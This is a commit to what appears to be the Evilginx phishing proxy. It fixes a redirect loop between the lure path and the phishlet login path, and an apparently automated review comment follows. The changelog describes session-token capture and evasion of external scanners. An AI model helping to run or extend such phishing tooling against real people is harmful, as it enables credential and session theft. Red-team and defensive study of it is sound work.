fixed: infinite redirection loop when lure url was the same as phishlet login path

This commit is contained in:
Kuba Gretzky 2024-04-01 15:38:43 +02:00
parent e6b421af6b
commit b570e846ce
2 changed files with 11 additions and 4 deletions


@ -4,9 +4,11 @@
- Feature: Added ability to inject `force_post` POST parameters into JSON content body (by [@yudasm_](https://twitter.com/yudasm_)).
- Feature: Added ability to disable automated TLS certificate retrieval from LetsEncrypt with `config autocert <on/off>`.
- Feature: Evilginx will now properly recognize origin IP for requests coming from behind a reverse proxy (nginx/apache2/cloudflare/azure).
- Fixed: Infinite redirection loop if the lure URL path was the same as the login path defined in the phishlet.
- Fixed: Added support for exported cookies with names prefixed with `__Host-` and `__Secure-`.
- Fixed: Global `unauth_url` can now be set to an empty string to have the server return `403` on unauthorized requests.
- Fixed: Unauthorized redirects and blacklisting would be ignored for `proxy_hosts` with `session: false` (default) making it easy to detect evilginx by external scanners.
- Fixed: IP address `127.0.0.1` is now ignored from being added to the IP blacklist.
# 3.2.0
- Feature: URL redirects on successful token capture now work dynamically on every phishing page. Pages do not need to reload or redirect first for the redirects to happen.


@ -580,10 +580,15 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
if err == nil {
// redirect from lure path to login url
rurl := pl.GetLoginUrl()
resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
if resp != nil {
resp.Header.Add("Location", rurl)
return req, resp
u, err := url.Parse(rurl)
if err == nil {
if strings.ToLower(req_path) != strings.ToLower(u.Path) {
resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
if resp != nil {
resp.Header.Add("Location", rurl)
return req, resp
}
}
}
}
}
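Review bot: The loop guard `if strings.ToLower(req_path) != strings.ToLower(u.Path) {` carries no explanation of why the redirect is skipped, and the comment above it, `// redirect from lure path to login url`, no longer describes the branch; I would add `// skip the redirect when the lure path already is the login path, otherwise the 302 would point back at this handler and loop` and write the comparison as `if !strings.EqualFold(req_path, u.Path) {`, which is the idiomatic case-insensitive compare and avoids two temporary strings. The check compares the bare path only, so a lure path and login path that differ by a trailing slash or by query string would presumably still be treated as different — worth confirming against how req_path is derived, which happens outside this hunk. When `url.Parse(rurl)` fails the new code falls through silently with no log line, which makes a malformed login URL hard to diagnose; a comment stating that fall-through is intentional, or a debug log, would help. The enclosing handler (inside NewHttpProxy) both starts and ends outside the hunk.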